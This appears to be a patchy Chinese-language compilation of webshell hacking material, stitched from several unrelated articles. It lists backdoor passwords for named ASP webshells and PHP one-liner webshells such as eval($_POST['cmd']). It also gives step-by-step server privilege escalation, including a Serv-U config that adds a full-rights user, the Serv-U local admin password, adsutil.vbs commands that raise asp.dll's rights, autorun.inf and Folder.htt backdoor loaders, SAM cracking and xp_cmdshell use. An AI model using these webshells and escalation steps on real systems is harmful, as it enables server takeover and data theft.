WebShell黑羽基地免杀asp大马Hacked By CHINA!Asp站长助手6.0web综合安全评测 - Beta3未知数Xbaidu}"路遥知马力黑客网站之家 美化版Thé、End.゛笑佛天下西域小刚-站长助手-修改版本XXXXX暗组超强功能修正去后门加强S-U提权版黑客官方-长期提供网站入侵 密码破解 数据库入侵ASPAdmin_A火狐ASP木马(超强版)"雨夜孤魂Dark Security Team随风自由的泪伟大的农民mr.con asp小马JspX围剿专版maek dreamShell靈魂◆安全小组+"银河安全网ASPXSpyDarkNo Backdoor Webshell(刀)黑勇士shell勇士版小武来了Evil sadnessF.S.T 联盟交流群内部版!!!别外传噢独自等待专用windows[D.s.T]会员专用WebShell我要进去'Rose随风自由的泪F.S.T 海盗内部版.!别外传噢。
by 海盗6.0 VIP(密码防破解版JFengEvil sadness路遥知马力奥运专版网站维护工具(加强版)"黑客官方未知数X心动吧ASP超级提权修正加强版200801242010贺岁版 免杀 WebShellMichael、T 专用asp提权木马Evil sadness邪恶的装逼大叔冰菊【HACKYONG】最终版芝麻开门aiezu萧萧文件管理Password:冷血奥运专版网站维护工具(加强版by:空气暗组超强功能修正去后门加强S-U提权版火狐ASP木马(超强版)" 华夏五周年庆典版(中国数据)asp 黑客→kissyEvil sadnessF.S.T 联盟交流群内部版.!别外传噢username这是一个没有信仰的年代伟沙漠之烟去演绎神话吧'Sam,asp大马修正加强版 QQ:42466841fuck you小武来了Baiki-"LoginE.V.A.V 专 用 网 马『修改版』月满西楼蛋蛋WEBSHELL鼠年增强版乄缘來④妳专版免杀asp大马F.S.T 联盟交流群内部版.!别外传噢暗组超强功能修正去后门加强S-U提权版80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一asp G.xp 专用SatanF.S.T 联盟交流群内部版!!!别外传噢!!!Evil sadness懂你味道黑鹰专用WEBSHELL思易免杀ASP木马3.0(最新两款)TX-网络专用ASP木马F.S.T 联盟交流群内部版.!别外传噢。
本地溢出提权
本地溢出提权0x00 前言0x01 找可写目录0x02 运行exploit提权0x03 附录0x00 前言溢出漏洞就像杯子里装水,水多了杯子装不进去,就会把里面的水溢出来.而相对计算机来说计算机有个地方叫缓存区,程序的缓存区长度是被事先设定好的,如果用户输入的数据超过了这个缓存区的长度,那么这个程序就会溢出了.缓存区溢出漏洞主要是由于许多软件没有对缓存区检查而造成的.这一章大概就是说利用一些现成的造成溢出漏洞的exploit通过运行,把用户从users组或其它系统用户中提升到administrators组.首先asp webshell要支持wscript(wscript.shell/shell.application)一般翻开webshell里面都会有组件支持,看到wscript.shell 旁边的勾选上了就支持wscript,当然也有一些webshell会有诈胡的现象.- -市面上的几款比拟火的webshell貌似都有这些问题,帮朋友提权他的webshell有wscript.shell 支持,然后找个目录执行cmd的结果不行,转到我那webshell上显示没wscript.shell 支持..或者aspx能调用.net组件来执行cmd的命令.这里主要用几款市面上比拟多人利用的windows exploit提权的利用工具.0x01 找可写目录这里附上啊D写的asp版本扫描可写目录和欧欧写的aspx扫可写目录,最后附上一款我自己比拟喜欢用来日星外时候的辅助小手冰凉的aspx 通过查注册表然后获取路径,配合啊D 的扫可写目录比拟不错.这些工具我们都演示一遍吧.输入目录,然后点击开始检测,得出以下结果蓝色是貌似是代表有一定的权限,未必可写(可能可读),红色是代表文件夹可写,红色的文件呢就是代表那个文件可写了,黑色是代表不存在该文件夹.接下来演示一下欧欧写的aspx扫描,比拟简单,一看就清楚了..输入文件夹路径或者盘符0.0,接着点击ScanWrtieable即可.最后是演示一下小手冰凉写的这款通过读取注册表里的软件的路径,然后输出注册表里的数据,显示软件安装所在的路径..配合啊D的目录读写检测asp版,可以快速的找到可写目录。
获取webshell的十种方法
获取webshell的⼗种⽅法⿊客在⼊侵企业⽹站时,通常要通过各种⽅式获取webshell从⽽获得企业⽹站的控制权,然后⽅便进⾏之后的⼊侵⾏为。
本篇⽂章将如何获取webshell总结成为了⼗种⽅法,希望⼴⼤的企业⽹络管理员能够通过了解获取的途径,对企业⾃⾝进⾏防范。
⼀、通过上传⽂件类型过滤漏洞获取webshell由于未采⽤⽩名单过滤⽂件类型,导致asa,cer,等⽂件类型,未进⾏限制,asa,cer类型⽂件的映射处理默认跟asp映射处理⼀样,将webshell伪装成该种类型的⽂件上传即可⼆、结合Burp Suite⼯具,修改上传⽂件信息,逃避验证现在很多的脚本程序上传模块不是只允许上传合法⽂件类型,⽽⼤多数的系统是允许添加上传类型 php.g1f的上传类型,这是php的⼀个特性,最后的哪个只要不是已知的⽂件类型即可,php会将php.g1f作为。
php来正常运⾏,从⽽也可成功拿到shell.LeadBbs3.14后台获得webshell⽅法是:在上传类型中增加asp ,注意,asp后⾯是有个空格的,然后在前台上传ASP马,当然也要在后⾯加个空格!三、利⽤后台管理功能写⼊webshell上传漏洞基本上补的也差不多了,所以我们进⼊后台后还可以通过修改相关⽂件来写⼊webshell.⽐较的典型的有dvbbs6.0,还有leadbbs2.88等,直接在后台修改配置⽂件,写⼊后缀是asp的⽂件。
⽽LeadBbs3.14后台获得webshell另⼀⽅法是:添加⼀个新的友情链接,在⽹站名称处写上冰狐最⼩马即可,最⼩马前后要随便输⼊⼀些字符,http:\\⽹站\inc\IncHtm\BoardLink.asp就是我们想要的shell.四、利⽤xpcmd..命令⽣成webshell五、利⽤后台数据库备份及恢复获取webshell主要是利⽤后台对access数据库的“备份数据库”或“恢复数据库”功能,“备份的数据库路径”等变量没有过滤导致可以把任意⽂件后缀改为asp,从⽽得到webshell,msssql版的程序就直接应⽤了access版的代码,导致sql版照样可以利⽤。
最强黑吃黑:WEBSHELL大马隐藏万能密码大全
最强⿊吃⿊:WEBSHELL⼤马隐藏万能密码⼤全因为很多原因,很多新⼿都不会编写⾃⼰的⼤马,⼤多数新⼿都会通过百度去下载对应脚本的⼤马,然⽽这些webshell⼤马都是早期流传出来的,基本上都存在后门,可以通过万能密码登录,即使你修改i过密码了,怎么样是不是很可怕?下⾯⼩编就将这些万能密码分享给⼤家吧!⿊⽻基地免杀asp⼤马密码5201314Hacked By CHINA! 密码chinaAsp站长助⼿6.0 密码584521web综合安全评测 – Beta3 密码nohack未知数X 密码45189946baidu}” 密码baidu路遥知马⼒密码123⿊客⽹站之家美化版密码chenxueThé、End.゛密码and QQ:2780217151笑佛天下密码cnot西域⼩刚-站长助⼿-修改版本密码xxoxxXXXXX 密码rinima暗组超强功能修正去后门加强S-U提权版密码hkk007⿊客官⽅-长期提供⽹站⼊侵,密码破解数据库⼊侵密码chengnuoASPAdmin_A 密码”5556661221″ ‘123456⽕狐ASP⽊马(超强版)” 密码wrsk⾬夜孤魂密码54321Dark Security Team 密码yuemo 或者xingainian随风⾃由的泪密码jcksyes伟⼤的农民密码521mr.con asp⼩马密码*******JspX 密码4lert围剿专版密码yuemo或者5201314maek dream 密码hackerShell 密码xxxxx靈魂◆安全⼩组+” 密码10011C120105101银河安全⽹密码fclsharkASPXSpy 密码19880118Dark 密码376186027No Backdoor Webshell(⼑) 密码admin⿊勇⼠shell勇⼠版密码654321⼩武来了密码535039Evil sadness 密码adminF.S.T 联盟交流群内部版别外传噢密码000独⾃等待专⽤密码123windows 密码 123[D.s.T]会员专⽤WebShell 密码darkst我要进去’ 密码jcksyesHacker‘Rose 密码123456随风⾃由的泪密码jcksyesF.S.T 海盗内部版.!别外传噢。
web提权方法
web提权方法
Web提权是指利用Web应用的安全漏洞,提升自己的权限,从而获得对系统的控制权。
以下是几种常见的Web提权方法:
1. 跨站脚本攻击(XSS):攻击者在Web应用程序中注入恶意的HTML或JavaScript代码,当其他用户访问该页面时,代码会被执行,攻击者可以利用这个漏洞获取用户的敏感信息或者执行其他恶意操作。
通过XSS漏洞,
攻击者可以提升自己的权限,例如获取管理员的会话令牌、执行任意脚本等。
2. 服务器端请求伪造(SSRF):Web应用程序中的服务器端请求伪造漏洞允许攻击者利用内部网络资源来访问敏感数据或执行恶意操作。
攻击者可以利用这个漏洞来获取服务器的内部IP地址、端口号等信息,进而提升自己
的权限。
3. 目录遍历漏洞:目录遍历漏洞是指攻击者通过在URL中输入特殊字符来
访问Web应用程序中不存在的目录或文件。
攻击者可以利用这个漏洞来获
取敏感文件或目录的信息,例如数据库配置文件、源代码文件等,进而利用这些信息来提升自己的权限。
4. 命令注入漏洞:攻击者在Web应用程序的输入字段中输入恶意的命令或代码,当应用程序执行这些命令或代码时,攻击者可以控制应用程序的行为。
通过命令注入漏洞,攻击者可以执行任意的系统命令,进而提升自己的权限。
要防止Web提权漏洞,应该加强Web应用程序的安全性,包括输入验证、输出编码、参数化查询等措施。
同时,应该及时更新和修补已知的漏洞,并定期进行安全审计和代码审查,以确保应用程序的安全性。
webshell一句话
webshell一句话1. PHP一句话WebshellPHP一句话Webshell是一种常见的Web攻击工具,它可以通过web 页面执行系统命令,获取服务器权限,进而对目标服务器进行控制和攻击。
下面列举了十个常用的PHP一句话Webshell。
1. eval($_POST['cmd']);这是最基本的一句话Webshell,通过接收POST参数cmd来执行任意系统命令。
2. echo shell_exec($_GET['cmd']);利用shell_exec函数执行命令,并将结果输出到页面上。
3. system($_REQUEST['cmd']);通过system函数执行系统命令,并返回命令执行结果。
4. passthru($_REQUEST['cmd']);使用passthru函数执行系统命令,并将结果原样输出。
5. exec($_POST['cmd'], $output);通过exec函数执行命令,并将结果保存到$output变量中。
6. popen($_GET['cmd'], 'r');通过popen函数执行命令,并返回一个文件指针,可以用来读取命令执行结果。
7. proc_open($_REQUEST['cmd'], array(0 => STDIN, 1 => STDOUT, 2 => STDERR), $pipes);通过proc_open函数执行命令,并将输入、输出和错误流分别重定向到标准输入、输出和错误流。
8. shell_exec(base64_decode($_GET['cmd']));对命令进行base64编码,然后使用shell_exec函数执行解码后的命令。
9. $_GET['a']($_POST['b']);通过GET参数a指定要执行的函数,POST参数b作为函数的参数。
渗透利器常见的WebShell管理工具
渗透利器常见的WebShell管理⼯具攻击者在⼊侵⽹站时,通常要通过各种⽅式写⼊Webshell,从⽽获得服务器的控制权限,⽐如执⾏系统命令、读取配置⽂件、窃取⽤户数据,篡改⽹站页⾯等操作。
本⽂介绍⼗款常⽤的Webshell管理⼯具,以供你选择,你会选择哪⼀个?1、中国菜⼑(Chopper)中国菜⼑是⼀款专业的⽹站管理软件,⽤途⼴泛,使⽤⽅便,⼩巧实⽤。
只要⽀持动态脚本的⽹站,都可以⽤中国菜⼑来进⾏管理!在⾮简体中⽂环境下使⽤,⾃动切换到英⽂界⾯。
UNICODE⽅式编译,⽀持多国语⾔输⼊显⽰。
2、蚁剑(AntSword)AntSword是⼀个开放源代码,跨平台的⽹站管理⼯具,旨在满⾜渗透测试⼈员以及具有权限和/或授权的安全研究⼈员以及⽹站管理员的需求。
github项⽬地址:3、C⼑(Cknife)这是⼀款跨平台的基于配置⽂件的中国菜⼑,把所有操作给予⽤户来定义。
github项⽬地址:4、冰蝎(Behinder)冰蝎”是⼀款动态⼆进制加密⽹站管理客户端。
github地址:5、XiseXISE WebShell管理⼯具。
6、AltmanAltman3是⼀款渗透测试软件,基于.Net4.0开发,依托Eto.Form可以完美运⾏在Windows、Linux、Mac等多个平台。
github项⽬地址:7、WeevelyWeevely是⼀种Python编写的webshell管理⼯具,跨平台,只⽀持PHP。
github项⽬地址:⽤法⽰例:weevely generate <password> <path>weevely <URL> <password> [cmd]同时,在Kali 2.0 版本下,集成了三款Web后门⼯具:WebaCoo、weevely、PHP Meterpreter。
8、QuasiBotQuasiBot是⼀款php编写的webshell管理⼯具,可以对webshell进⾏远程批量管理。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
WEBSHELL权限提升技巧c: d: e:.....C:\Documents and Settings\All Users\「开始」菜单\程序\看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere 密码,登陆c:\Program Files\serv-u\C:\WINNT\system32\config\下它的SAM,破解密码c:\winnt\system32\inetsrv\data\是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行c:\prelC:\Program Files\Java Web Start\c:\Documents and Settings\C:\Documents and Settings\All Users\c:\winnt\system32\inetsrv\data\c:\Program Files\c:\Program Files\serv-u\C:\Program Files\Microsoft SQL Server\c:\Temp\c:\mysql\(如果服务器支持PHP)c:\PHP(如果服务器支持PHP)运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限还可以用这段代码试提升,好象不是很理想的如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。
根目录下隐藏autorun.infC:\PROGRAM FILES\KV2004\ 绑D:\PROGRAM FILES\RISING\RAV\C:\Program Files\Real\RealServer\rarFolder.htt与desktop.ini将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下replace 替换法捆绑脚本编写一个启动/关机脚本重起删SAM 错CAcls命令FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bakRing的权限提升21大法!以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过的。
本人不才,除了第一种方法自己研究的,其他的都是别人的经验总结。
希望对朋友有帮助!1.radmin连接法条件是你权限够大,对方连防火墙也没有。
封装个radmin上去,运行,开对方端口,然后radmin上去。
本人从来米成功过。
,端口到是给对方打开了。
2.paanywhereC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的GIF文件,在本地安装pcanywhere上去3.SAM破解C:\WINNT\system32\config\ 下他的SAM 破解之4.SU密码夺取C:\Documents and Settings\All Users\「开始」菜单\程序\引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空[USER=WekweN|1]Password=HomeDir=c:\TimeOut=600Maintenance=SystemAccess1=C:\|RWAMELCDPAccess1=d:\|RWAMELCDPAccess1=f:\|RWAMELCDPSKEYvalues=这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限5.c:\winnt\system32\inetsrv\data\引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行6.SU溢出提权这个网上教程N多不详细讲解了7.运行Csript引用:运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps 查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll再将asp.dll加入特权一族asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样) 我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll""C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll""C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了 8.脚本提权c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs9.VNC这个是小花的文章 HOHO默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password我们可以用vncx4破解它,vncx4使用很简单,只要在命令行下输入c:\>vncx4 -W然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。
10.NC提权给对方来个NC 但是条件是你要有足够的运行权限然后把它反弹到自己的电脑上 HOHO OK 了11.社会工程学之GUEST提权很简单查看他的拥护一般来说看到帐户以后密码尽量猜可能用户密码一样也可能是他QQ号邮箱号手机号尽量看看 HOHO12.IPC空连接如果对方真比较白痴的话扫他的IPC 如果运气好还是弱口令13.替换服务这个不用说了吧?个人感觉相当复杂14.autorun .infautorun=xxx.exe 这个=后面自己写 HOHO 加上只读、系统、隐藏属性传到哪个盘都可以的不相信他不运行15.desktop.ini与Folder.htt引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择"自定义文件夹"(xp好像是不行的)一直下点,默认即可。
完成后,你就会看到在此目录下多了两个名为Foldersetting的文件架与desktop.ini的文件,(如果你看不到,先取消"隐藏受保护的操作系统文件")然后我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码: <OBJECTID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的后门文件名"></OBJECT> 然后你将你的后门文件放在Folder setting目录下,把此目录与desktop.ini 一起上传到对方任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门16.su覆盖提权本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重起一下Serv-U,于是你上面的所有配置都与他的一模一样了17.SU转发端口43958这个是 Serv -U 的本地管理端口。
FPIPE.exe上传他,执行命令: Fpipe –v –l 3333 –r43958 127.0.0.1 意思是将4444端口映射到43958端口上。
然后就可以在本地安装一个Serv-u,新建一个服务器,IP填对方IP,帐号为LocalAdministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的Serv-u了18.SQL帐户密码泄露如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的ASP文件中看到),因为MSSQL是默认的SYSTEM权限。
引用:对方没有删除xp_cmdshell 方法:使用Sqlexec.exe,在host 一栏中填入对方IP,User与Pass中填入你所得到的用户名与密码。
format选择xp_cmdshell"%s"即可。
然后点击connect,连接上后就可以在CMD一栏中输入你想要的CMD命令了19.asp.dll引用:因为asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定相同)我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll""C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll""C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"好了,现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到C:\Inetpub\AdminScripts>这个目录下.那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.20.Magic Winmail前提是你要有个webshell 引用:/forum/read.php?tid=3587这里去看吧21.DBO……其实提升权限的方式很多的就看大家怎么利用了 HOHO 加油吧将服务器控制到底!感谢noangelWEBSHELL权限提升动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容OK,进入我的WEBSHELL啊哈,不错,双CPU,速度应该跟的上,不拿下你我怎么甘心啊输入密码,进入到里面看看,有什么好东西没有,翻了下,好像也没有什么特别的东西,看看能不能进到其他的盘符,点了下C盘,不错不错,可以进去,这样提升就大有希望了一 serv-u提升OK,看看他的PROGRAME里面有些什么程序,哦,有SERV-U,记得有次看到SERV-U有默认的用户名和密码,但是监听的端口是43958,而且是只有本地才能访问的,但是我们有端口转发工具的啊,不怕。